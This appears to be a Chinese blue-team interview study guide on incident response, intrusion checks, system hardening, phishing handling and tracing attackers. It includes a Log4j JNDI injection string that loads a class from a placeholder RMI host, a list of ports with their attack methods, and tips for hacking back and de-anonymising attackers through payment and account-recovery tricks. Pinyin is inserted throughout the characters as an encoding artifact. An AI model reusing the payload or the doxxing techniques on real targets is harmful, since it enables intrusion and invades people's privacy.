藍(lán)隊(duì)面試知識(shí)點(diǎn)整理

整理自網(wǎng)絡(luò)

1.應(yīng)急響應(yīng)基本思路流程

收集信息：收集客戶信息和中毒主機(jī)信息，包括樣本

判斷類型：判斷是否是安全事件，何種安全事件，勒索、挖礦、斷網(wǎng)、DoS 等等

抑制范圍：隔離使受害?不繼續(xù)擴(kuò)?

深入分析：日志分析、進(jìn)程分析、啟動(dòng)項(xiàng)分析、樣本分析方便后期溯源

清理處置：殺掉進(jìn)程，刪除文件，打補(bǔ)丁，刪除異常系統(tǒng)服務(wù)，清除后門(mén)賬號(hào)防止事件擴(kuò)大，處理完畢后恢復(fù)生產(chǎn)

產(chǎn)出報(bào)告：整理并輸出完整的安全事件報(bào)告

2.Windows入侵排查思路

檢查系統(tǒng)賬號(hào)安全

1.1 查看服務(wù)器是否有弱口令，遠(yuǎn)程管理端口是否對(duì)公網(wǎng)開(kāi)放（使用netstat -ano 命令、或者問(wèn)服務(wù)器管理員）

1.2 lusrmgr.msc命令查看服務(wù)器是否存在可疑賬號(hào)、新增賬號(hào)，如有管理員群組的（Administrators）里的新增賬戶，如有，立即禁用或刪除掉

1.3 用 D 盾或者注冊(cè)表中查看服務(wù)器是否存在隱藏賬號(hào)、克隆賬號(hào)
　　
在cmd中輸入：net user 看看有沒(méi)有陌生用戶
在cmd中輸入：regedit 找到注冊(cè)表分支 “HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/”看看有沒(méi)有克隆用戶
　　
1.4 結(jié)合日志，查看管理員登錄時(shí)間、用戶名是否存在異常

檢查方法：Win+R 打開(kāi)運(yùn)行，輸入“eventvwr.msc”，回車運(yùn)行，打開(kāi)“事件查看器”，導(dǎo)出 Windows 日志–安全，利用 Log Parser 進(jìn)行分析
系統(tǒng)日志包含Windows系統(tǒng)組件記錄的事件。應(yīng)用程序日志包含由應(yīng)用程序或程序記錄的事件。安全日志包含諸如有效和無(wú)效的登錄嘗試等事件，以及與資源使用相關(guān)的事件，如創(chuàng)建、打開(kāi)或刪除文件或其他對(duì)象。

檢查異常端口、進(jìn)程

netstat -ano檢查端口連接情況，是否有遠(yuǎn)程連接、可疑連接
在cmd命令行中輸入 netstat -ano 查看目前的網(wǎng)絡(luò)連接，定位可疑的pid。
根據(jù)定位出的pid，再通過(guò)tasklist命令進(jìn)行進(jìn)程定位 tasklist | findstr “PID”
發(fā)現(xiàn)的感覺(jué)異常的 IP 地址可以在威脅情報(bào)平臺(tái)上查詢，如果是已知的惡意 IP，可以比較快速的確認(rèn)攻擊方式。

任務(wù)管理器-進(jìn)程
進(jìn)程查看工具：procexp.exe

檢查啟動(dòng)項(xiàng)、計(jì)劃任務(wù)、服務(wù)

啟動(dòng)項(xiàng)查看工具：autoruns.exe
計(jì)劃任務(wù)查看：按下win+r鍵打開(kāi)運(yùn)行，輸入taskschd.msc 打開(kāi)任務(wù)計(jì)劃，查看有沒(méi)有可疑的計(jì)劃任務(wù)。

檢查系統(tǒng)相關(guān)信息

查看系統(tǒng)版本以及補(bǔ)丁信息
查找可疑目錄及文件

日志分析
如果數(shù)據(jù)庫(kù)被入侵，查看數(shù)據(jù)庫(kù)登錄日志等，如Sqlserver數(shù)據(jù)庫(kù)支持設(shè)置記錄用戶登錄成功 和失敗的日志信息。

3.Linux入侵排查思路

• 1 賬號(hào)安全

  who 查看當(dāng)前登錄用戶（tty本地登陸 pts遠(yuǎn)程登錄） w 查看系統(tǒng)信息，想知道某一時(shí)刻用戶的行為 uptime 查看登陸多久、多少用戶，負(fù)載 a) 用戶信息文件/etc/passwdroot:x:0:0:root:/root:/bin/bash account:password:UID:GID:GECOS:directory:shell 用戶名：密碼：用戶ID：組ID：用戶說(shuō)明：家目錄：登陸之后shell 注意：無(wú)密碼只允許本機(jī)登陸，遠(yuǎn)程不允許登陸b) 影子文件/etc/shadowroot:$6$oGs1PqhL2p3ZetrE$X7o7bzoouHQVSEmSgsYN5UD4.kMHx6qgbTqwNVC5oOAouXvcjQSt.Ft7ql1WpkopY0UV9ajBwUt1DpYxTCVvI/:16809:0:99999:7::: 用戶名：加密密碼：密碼最后一次修改日期：兩次密碼的修改時(shí)間間隔：密碼有效期：密碼修改到期到的警告天數(shù)：密碼過(guò)期之后的寬限天數(shù)：賬號(hào)失效時(shí)間：保留

  /etc/passwd 存儲(chǔ)一般的用戶信息，任何人都可以訪問(wèn)；/etc/shadow 存儲(chǔ)用戶的密碼信息，只有 root 用戶可以訪問(wèn)

• 2 歷史命令

  1、root的歷史命令 histroy 2、打開(kāi) /home 各帳號(hào)目錄下的 .bash_history，查看普通帳號(hào)的歷史命令歷史操作命令的清除：history -c 但此命令并不會(huì)清除保存在文件中的記錄，因此需要手動(dòng)刪除.bash_history文件中的記錄

• 3 檢查異常端口

  netstat -antlp|morels -l /proc/$PID/XXX file /proc/$PID/XXX 查看pid所對(duì)應(yīng)的進(jìn)程文件信息

• 4 檢查異常進(jìn)程

  ps aux | grep pid

• 5 檢查開(kāi)機(jī)啟動(dòng)項(xiàng)

  /etc/rc.local /etc/rc.d/rc[0~6].d

• 6 檢查定時(shí)任務(wù)

  crontab -l 列出某個(gè)用戶cron服務(wù)的詳細(xì)內(nèi)容 Tips：默認(rèn)編寫(xiě)的crontab文件會(huì)保存在 (/var/spool/cron/用戶名 例如: /var/spool/cron/root crontab -r 刪除某個(gè)用戶cront任務(wù) crontab -e 使用編輯器編輯當(dāng)前的crontab文件

• 7 檢查服務(wù)

  chkconfig --list systemctl list-unit-files 查看系統(tǒng)運(yùn)行的服務(wù)

• 8 檢查異常文件

• 9 檢查系統(tǒng)日志

• 10.其他常用命令
  系統(tǒng)信息

  • 查看當(dāng)前系統(tǒng)狀態(tài) top
  • 操作系統(tǒng)信息 uname -a
  • 查看當(dāng)前系統(tǒng)進(jìn)程信息 ps
  • 查看歷史命令 history
  • 列出本機(jī)所有的連接和監(jiān)聽(tīng)的端口 netstat
  • 查看誰(shuí)在使用某個(gè)端口 lsof

  系統(tǒng)信息

  • 查看當(dāng)前用戶登錄系統(tǒng)情況 who
  • 查看可登錄的賬戶 cat/etc/passwd|grep ‘/bin/bash’
  • 查看用戶錯(cuò)誤的登錄信息 lastb
  • 查看所有用戶最后的登錄信息 lastlog
  • 查看用戶最近登錄信息 last
  • /var/log/ 其中，/var/log/wtmp 存儲(chǔ)登錄成功的信息、btmp存儲(chǔ)登錄失敗的信息、utmp存儲(chǔ)當(dāng)前正在登錄的信息
  • 查看超級(jí)權(quán)限賬戶awk -F: '$3==0 {print $1}' /etc/passwd
  • 查看空口令賬戶 awk -F: 'length($2)==0 {print $1}' /etc/shadow

4.Linux基線規(guī)范

賬號(hào)管理和授權(quán)

• 檢查特殊賬號(hào)，是否存在空密碼的賬戶和 root 權(quán)限賬戶
• 禁用或刪除無(wú)用賬號(hào)
• 添加口令策略:/etc/login.defs修改配置文件，設(shè)置過(guò)期時(shí)間、連續(xù)認(rèn)證失敗次數(shù)
• 禁止 root 遠(yuǎn)程登錄，限制root用戶直接登錄。
• 檢查 su 權(quán)限。vi /etc/pam.d/su添加auth required pam_wheel.so group=test

服務(wù)

• 關(guān)閉不必要的服務(wù)
• SSH 服務(wù)安全
  • 不允許 root 賬號(hào)直接登錄系統(tǒng)，PermitRootLogin=no
  • 修改 SSH 使用的協(xié)議版本為 2
  • 修改允許密碼錯(cuò)誤次數(shù)（默認(rèn) 6 次），MaxAuthTries=3

文件系統(tǒng)

• 設(shè)置 umask 值 vi /etc/profile 添加行 umask 027
• 設(shè)置登錄超時(shí) vi /etc/profile 修改配置文件，將以 TMOUT= 開(kāi)頭的行注釋，設(shè)置為 TMOUT=180

日志

• 啟用 syslogd 日志，配置日志目錄權(quán)限，或者設(shè)置日志服務(wù)器

• 記錄所有用戶的登錄和操作日志，通過(guò)腳本代碼實(shí)現(xiàn)記錄所有用戶的登錄操作日志，防止出現(xiàn)安全事件后無(wú)據(jù)可查

IP 協(xié)議安全要求

• 遠(yuǎn)程登錄取消 telnet 采用 ssh
• 設(shè)置 /etc/hosts.allow 和 deny
• 禁止 ICMP 重定向
• 禁止源路由轉(zhuǎn)發(fā)
• 防 ssh 破解，iptables (對(duì)已經(jīng)建立的所有鏈接都放行，限制每分鐘連接 ssh 的次數(shù))+ denyhost (添加 ip 拒絕訪問(wèn))

5.Apache 服務(wù)加固

https://www.alibabacloud.com/help/zh/security-advisories/latest/harden-apache-service-security

6.常用web中間件漏洞

https://www.freebuf.com/articles/web/192063.html

（一） IIS
1、PUT漏洞
2、短文件名猜解
3、遠(yuǎn)程代碼執(zhí)行
4、解析漏洞

（二） Apache
1、解析漏洞
2、目錄遍歷

（三） Nginx
1、文件解析
2、目錄遍歷
3、CRLF注入
4、目錄穿越

（四）Tomcat
1、遠(yuǎn)程代碼執(zhí)行
2、war后門(mén)文件部署

（五）jBoss
1、反序列化漏洞
2、war后門(mén)文件部署

（六）WebLogic
1、反序列化漏洞
2、SSRF
3、任意文件上傳
4、war后門(mén)文件部署

（七）其它中間件相關(guān)漏洞
1、FastCGI未授權(quán)訪問(wèn)、任意命令執(zhí)行
2、PHPCGI遠(yuǎn)程代碼執(zhí)行

7.護(hù)網(wǎng)的分組和流程？

護(hù)網(wǎng)的分組是在領(lǐng)導(dǎo)小組之下分為防護(hù)檢測(cè)組，綜合研判組，應(yīng)急溯源組。流程大致分為備戰(zhàn)，臨戰(zhàn)，決戰(zhàn)三個(gè)階段

備戰(zhàn)階段，主要任務(wù)是進(jìn)行兩方面的操作，一是減少攻擊面，即資產(chǎn)梳理，減少暴露面；二是排查風(fēng)險(xiǎn)點(diǎn)，即通過(guò)漏洞掃描，滲透測(cè)試，弱口令等進(jìn)行自查

臨戰(zhàn)階段，主要任務(wù)也大致可以分為兩個(gè)部分，一是進(jìn)行內(nèi)部演練，發(fā)現(xiàn)疏忽處并進(jìn)行相應(yīng)整改；二是可以適當(dāng)增加安全設(shè)備，比如WAF，IPS，IDS，SOC，堡壘機(jī)等

決戰(zhàn)階段，作為新人，主要就是堅(jiān)守崗位，有應(yīng)急日志就看自己能不能解決，不能就上報(bào)，服從上級(jí)安排，優(yōu)化防護(hù)，持續(xù)整改

8.簡(jiǎn)歷有護(hù)網(wǎng)經(jīng)歷，你能談?wù)勛o(hù)網(wǎng)的情況嗎

參加過(guò)護(hù)網(wǎng)藍(lán)隊(duì)，負(fù)責(zé)事件研判工作，主要使用 ips，ids 等設(shè)備做流量監(jiān)控與日志分析工作判斷安全事件是否為誤判

對(duì)安全管理中心發(fā)出的態(tài)勢(shì)排查單進(jìn)行排查，并將排查結(jié)果反饋給安全管理中心，對(duì)安全管理中心發(fā)出的封堵工單和解封工單進(jìn)行對(duì)應(yīng)的封堵與解封，每?jī)尚r(shí)反饋一次排查結(jié)果、設(shè)備巡檢報(bào)告、封堵情況。查看呼池 DDOS 設(shè)備，記錄并排查告警信息

藍(lán)隊(duì)研判
研判工作要充分利用已有安全設(shè)備（需要提前了解客戶的網(wǎng)絡(luò)拓?fù)湟约安渴鹪O(shè)備情況），分析其近期的設(shè)備告警，將全部流量日志（日志條件：源地址，目的地址，端口，事件名稱，時(shí)間，規(guī)則 ID，發(fā)生 次數(shù)等）根據(jù)研判標(biāo)準(zhǔn)進(jìn)行篩選（像挖礦、蠕蟲(chóng)、病毒、拒絕服務(wù)這類不太可能為攻擊方發(fā)起的攻擊的事件，直接過(guò)濾掉，減少告警數(shù)量），一般情況下，真實(shí)攻擊不可能只持續(xù)一次，它一定是長(zhǎng)時(shí)間、周期性、多 IP 的進(jìn)行攻擊

對(duì)于告警結(jié)合威脅情報(bào)庫(kù)如：微步、奇安信威脅情報(bào)中心、綠盟威脅情報(bào)云等對(duì)于流量日志的原 IP 地址進(jìn)行分析，判斷其是否為惡意攻擊，推薦使用微步的插件，如果確認(rèn)為攻擊行為或者不能確認(rèn)是否為攻擊行為，進(jìn)行下一步操作，在之前準(zhǔn)備好的表格中查找 IP 是否為客戶內(nèi)網(wǎng)部署的設(shè)備，如果不是，繼續(xù)進(jìn)行下一步，在事件上報(bào)平臺(tái)查看是否有其他人提交過(guò)，如果沒(méi)有，則上報(bào)

然后根據(jù)流量日志，對(duì)請(qǐng)求數(shù)據(jù)包和返回?cái)?shù)據(jù)包分析判斷其是否為誤報(bào)，需要留意 X-Forwarded-For（簡(jiǎn)稱XFF）和 x-real-ip

可以了解些 webshell 工具的流量特征，尤其是免殺 webshell，有可能不會(huì)被設(shè)備識(shí)別

最后上報(bào)事件時(shí)，盡可能提供完整的截圖，包括源 ip、目的ip，請(qǐng)求包請(qǐng)求體，響應(yīng)包響應(yīng)體等重要信息，以方便后續(xù)人員研判溯源

9.一個(gè)大范圍影響的0day被曝光，作為甲方安全工程師，應(yīng)該如何處理

• 首先是評(píng)估 0day 對(duì)自身系統(tǒng)的影響（這部分評(píng)估需要根據(jù)漏洞利用的利用點(diǎn)、是否需要交互、是否會(huì)影響系統(tǒng)的 CIA，是否有在野利用 poc，影響資產(chǎn)是否暴露在公網(wǎng)等很多因素決定，詳情可以參考 CVSS ）
• 如果確定有影響的話且有 poc，第一件事是先分析 poc 執(zhí)行后會(huì)在什么地方留下痕跡，我們有什么樣的設(shè)備去采集這些痕跡所留下的數(shù)據(jù)，比如說(shuō) ntlm relay 這種，可以考慮從 Windows 事件日志當(dāng)中 event_id 等于 4769 的事件入手編寫(xiě)對(duì)應(yīng)的規(guī)則，這樣的話可以利用 SIEM 或者實(shí)時(shí)日志分析平臺(tái)跑起來(lái)，可以建立起初步的感知防線，后期觸發(fā)告警，人肉運(yùn)營(yíng)也可以快速止損
• 日常建立完整的縱深防御體系，不要依賴于某一道防線

10.釣魚(yú)郵件處置

釣魚(yú)郵件發(fā)現(xiàn)
發(fā)現(xiàn)途徑如下：郵件系統(tǒng)異常登錄告警、員工上報(bào)、異常行為告警、郵件蜜餌告警

推薦接入微步或奇安信的情報(bào)數(shù)據(jù)。對(duì)郵件內(nèi)容出現(xiàn)的 URL 做掃描，可以發(fā)現(xiàn)大量的異常鏈接
https://www.freebuf.com/articles/es/264037.html

處置

屏蔽辦公區(qū)域?qū)︶烎~(yú)郵件內(nèi)容涉及站點(diǎn)、URL 訪問(wèn)

• 根據(jù)辦公環(huán)境實(shí)際情況可以在上網(wǎng)行為管理、路由器、交換機(jī)上進(jìn)行屏蔽

• 郵件內(nèi)容涉及域名、IP 均都應(yīng)該進(jìn)行屏蔽

• 對(duì)訪問(wèn)釣魚(yú)網(wǎng)站的內(nèi)網(wǎng) IP 進(jìn)行記錄，以便后續(xù)排查溯源可能的后果

屏蔽釣魚(yú)郵件

• 屏蔽釣魚(yú)郵件來(lái)源郵箱域名

• 屏蔽釣魚(yú)郵件來(lái)源 IP

• 有條件的可以根據(jù)郵件內(nèi)容進(jìn)行屏蔽

• 刪除還在郵件服務(wù)器未被客戶端收取釣魚(yú)郵件

處理接收到釣魚(yú)郵件的用戶

• 根據(jù)釣魚(yú)郵件發(fā)件人進(jìn)行日志回溯

  此處除了需要排查有多少人接收到釣魚(yú)郵件之外，還需要排查是否公司通訊錄泄露。采用 TOP500 姓氏撞庫(kù)發(fā)送釣魚(yú)郵件的攻擊方式相對(duì)后續(xù)防護(hù)較為簡(jiǎn)單。如果發(fā)現(xiàn)是使用公司通訊錄順序則需要根據(jù)通訊錄的離職情況及新加入員工排查通訊錄泄露時(shí)間。畢竟有針對(duì)性的社工庫(kù)攻擊威力要比 TOP100、TOP500 大很多

• 通知已接收釣魚(yú)郵件的用戶進(jìn)行處理

  刪除釣魚(yú)郵件

  系統(tǒng)改密

  全盤(pán)掃毒

后續(xù)：溯源、員工培訓(xùn)提升安全意識(shí)

11.Log4j rce

log4j 是 java web 的日志組件，用來(lái)記錄 web 日志

原理：
以RMI為例，簡(jiǎn)單闡述下該漏洞的攻擊原理：

1、攻擊者首先發(fā)布一個(gè)RMI服務(wù)，此服務(wù)將綁定一個(gè)引用類型的RMI對(duì)象。在引用對(duì)象中指定一個(gè)遠(yuǎn)程的含有惡意代碼的類。

2、攻擊者再發(fā)布另一個(gè)惡意代碼下載服務(wù)，此服務(wù)可以下載所有含有惡意代碼的類。

3、攻擊者利用Log4j2的漏洞注入RMI調(diào)用，例如： log.info(“登錄成功”, “${jndi:rmi://rmi-service:1188/hackedclass}”);

4、調(diào)用RMI后將獲取到引用類型的RMI遠(yuǎn)程對(duì)象，該對(duì)象將就加載惡意代碼并執(zhí)行。

修復(fù)：升級(jí) Log4j 到最新版本，根據(jù)業(yè)務(wù)判斷是否關(guān)閉 lookup

12.WAF產(chǎn)品如何來(lái)攔截攻擊？

Waf 產(chǎn)品有三種

云 Waf

用戶不需要在自己的網(wǎng)絡(luò)中安裝軟件程序或部署硬件設(shè)備，就可以對(duì)網(wǎng)站實(shí)施安全防護(hù)，它的主要實(shí)現(xiàn)方式是利用 DNS 技術(shù)，通過(guò)移交域名解析權(quán)來(lái)實(shí)現(xiàn)安全防護(hù)。用戶的請(qǐng)求首先發(fā)送到云端節(jié)點(diǎn)進(jìn)行檢測(cè)，如存在異常請(qǐng)求則進(jìn)行攔截否則將請(qǐng)求轉(zhuǎn)發(fā)至真實(shí)服務(wù)器

Web 防護(hù)軟件

安裝在需要防護(hù)的服務(wù)器上，實(shí)現(xiàn)方式通常是 Waf 監(jiān)聽(tīng)端口或以 Web 容器擴(kuò)展方式進(jìn)行請(qǐng)求檢測(cè)和阻斷

硬件 Web 防火墻

Waf 串行部署在 Web 服務(wù)器前端，用于檢測(cè)、阻斷異常流量。常規(guī)硬件 Waf 的實(shí)現(xiàn)方式是通過(guò)代理技術(shù)代理來(lái)自外部的流量

原理都相同，通過(guò)部署在 Web 服務(wù)器前方串行接入來(lái)將 Web 流量牽引到 WAF 設(shè)備中進(jìn)行清洗或者攔截，最終只把正常用戶的請(qǐng)求轉(zhuǎn)發(fā)給服務(wù)器

當(dāng)前市場(chǎng)上 Waf 產(chǎn)品核心的防護(hù)機(jī)制是“規(guī)則”，每一個(gè)請(qǐng)求、會(huì)話，經(jīng)過(guò)抓包，“開(kāi)包檢查”，每一項(xiàng)規(guī)則都會(huì)檢查到，一旦檢查不通過(guò)，就會(huì)被認(rèn)為是非法訪問(wèn)，拒絕處理

13.溯源

基本步驟

1.攻擊源捕獲

• 安全設(shè)備報(bào)警，如掃描IP、威脅阻斷、病毒木馬、入侵事件等
• 日志與流量分析，異常的通訊流量、攻擊源與攻擊目標(biāo)等
• 服務(wù)器資源異常，異常的文件、賬號(hào)、進(jìn)程、端口，啟動(dòng)項(xiàng)、計(jì)劃任務(wù)和服務(wù)等
• 郵件釣魚(yú)，獲取惡意文件樣本、釣魚(yú)網(wǎng)站 URL 等
• 蜜罐系統(tǒng)，獲取攻擊者 ID、電腦信息、瀏覽器指紋、行為、意圖的相關(guān)信息

2.溯源反制手段

• IP 定位技術(shù)
  根據(jù)IP定位物理地址–代理 IP
  溯源案例：通過(guò) IP 端口掃描，反向滲透服務(wù)器進(jìn)行分析，最終定位到攻擊者相關(guān)信息
• ID 追蹤術(shù)
  ID 追蹤術(shù)，搜索引擎、社交平臺(tái)、技術(shù)論壇、社工庫(kù)匹配
  溯源案例：利用 ID 從技術(shù)論壇追溯郵箱，繼續(xù)通過(guò)郵箱反追蹤真實(shí)姓名，通過(guò)姓名找到相關(guān)簡(jiǎn)歷信息
• 網(wǎng)站 url
  域名 Whois 查詢–注冊(cè)人姓名、地址、電話和郵箱 --域名隱私保護(hù)
  溯源案例：通過(guò)攻擊 IP 歷史解析記錄/域名，對(duì)域名注冊(cè)信息進(jìn)行溯源分析
• 惡意樣本分析
  提取樣本特征、用戶名、ID、郵箱、C2 服務(wù)器等信息–同源分析
  溯源案例：樣本分析過(guò)程中，發(fā)現(xiàn)攻擊者的個(gè)人 ID 和 QQ，成功定位到攻擊者
• 社交賬號(hào)
  基于 JSONP 跨域，獲取攻擊者的主機(jī)信息、瀏覽器信息、真實(shí) IP 及社交信息等
  利用條件：可以找到相關(guān)社交網(wǎng)站的 jsonp 接口泄露敏感信息，相關(guān)網(wǎng)站登錄未注銷

3.攻擊者畫(huà)像

• 攻擊路徑

攻擊目的：拿到權(quán)限、竊取數(shù)據(jù)、獲取利益、DDOS 等
網(wǎng)絡(luò)代理：代理 IP、跳板機(jī)、C2 服務(wù)器等
攻擊手法：魚(yú)叉式郵件釣魚(yú)、Web滲透、水坑攻擊、近源滲透、社會(huì)工程等

• 攻擊者身份畫(huà)像

虛擬身份：ID、昵稱、網(wǎng)名
真實(shí)身份：姓名、物理位置
聯(lián)系方式：手機(jī)號(hào)、qq/微信、郵箱
組織情況：單位名稱、職位信息

技巧

• 域名、ip 反查目標(biāo)個(gè)人信息
• 支付寶轉(zhuǎn)賬，確定目標(biāo)姓氏
• 淘寶找回密碼，確定目標(biāo)名字
• 企業(yè)微信手機(jī)號(hào)查公司名稱
• REG007 查注冊(cè)應(yīng)用、網(wǎng)站
• 程序 PDB 信息泄露

13. 如何識(shí)別安全設(shè)備中的無(wú)效告警

比如說(shuō)：攻擊方通過(guò)對(duì)目標(biāo)資產(chǎn)所處的C段進(jìn)行批量掃描，但C段的資產(chǎn)并非都是處于「活躍」?fàn)顟B(tài)，甚至根本沒(méi)有這個(gè)資產(chǎn)。而安全設(shè)備還是因?yàn)檫@個(gè)「攻擊嘗試行為」產(chǎn)生了告警，那么這種告警就屬于“無(wú)效告警”。

比如說(shuō)：攻擊方嘗試?yán)矛F(xiàn)成的“EXP&POC集成腳本工具”對(duì)資產(chǎn)目標(biāo)進(jìn)行檢測(cè)掃描，安全設(shè)備檢測(cè)到“攻擊嘗試行為”中的攻擊特征就會(huì)產(chǎn)生告警。在通常情況下，可以把告警中的URL的“網(wǎng)頁(yè)狀態(tài)碼”、“頁(yè)面回顯數(shù)據(jù)”作為“誤報(bào)告警”判斷的條件之一。

14.常見(jiàn)的端口是哪些，是什么服務(wù)，對(duì)應(yīng)的紅隊(duì)攻擊方式

數(shù)據(jù)庫(kù)類（掃描弱口令）

• 1433：MSSQL
• 1521：Oracle
• 3306：Mysql
• 5432：PostgreSQL

特殊服務(wù)類（未授權(quán)/命令執(zhí)行）

• 443：ssl 心臟滴血
• 873：Rsync 未授權(quán)
• 5984：CouchDB http：//xxx:5984/_utils/
• 6379：Redis 未授權(quán)
• 7001、7002：Weblogic 默認(rèn)弱口令
• 8088：Hadoop Yarn 資源管理系統(tǒng) REST API 存在未授權(quán)
• 8161：Apache ActiveMQ 未授權(quán)、弱口令，put 文件上傳，move 文件移動(dòng)
• 9200、9300：elasticsearch 命令執(zhí)行
• 11211：Memcache 未授權(quán)，telnet ip 就可以獲得服務(wù)器敏感信息
• 27017、27018：Mongodb 未授權(quán)
• 50000：SAP 命令執(zhí)行
• 50070、50030 Hadoop 未授權(quán)訪問(wèn)

常用端口類（弱口令/端口爆破）

• 21：FTP 弱口令，匿名 anonymous/空登錄，以及 ms12-073
• 25：SMTP 簡(jiǎn)單郵件傳輸服務(wù)器端口
• 23：Telnet 的端口，Telnet 是一種可以遠(yuǎn)程登錄并管理遠(yuǎn)程機(jī)器的服務(wù)
• 22：ssh 端口，PcAnywhere 建立 TCP 和這一端口的連接可能是為了尋找 ssh，這一服務(wù)有許多弱點(diǎn)
• 53：dns 端口
• 139：屬于 TCP 協(xié)議，是為 NetBIOS Session Service 提供的，主要提供 Windows 文件和打印機(jī)共享以及 Unix 中的 Samba 服務(wù)
• 445：網(wǎng)絡(luò)共享 smb 服務(wù)，嘗試?yán)?ms08067，ms17010 等以及 IPC$ 攻擊手段
• 2601、2604：zebra 路由，默認(rèn)密碼 zebra

15.木馬駐留系統(tǒng)的方式有哪些？

a. 注冊(cè)表
b. 服務(wù)
c. 啟動(dòng)目錄
d. 計(jì)劃任務(wù)
e. 關(guān)聯(lián)文件類型

總結(jié)

以上是生活随笔為你收集整理的蓝队面试知识点整理的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。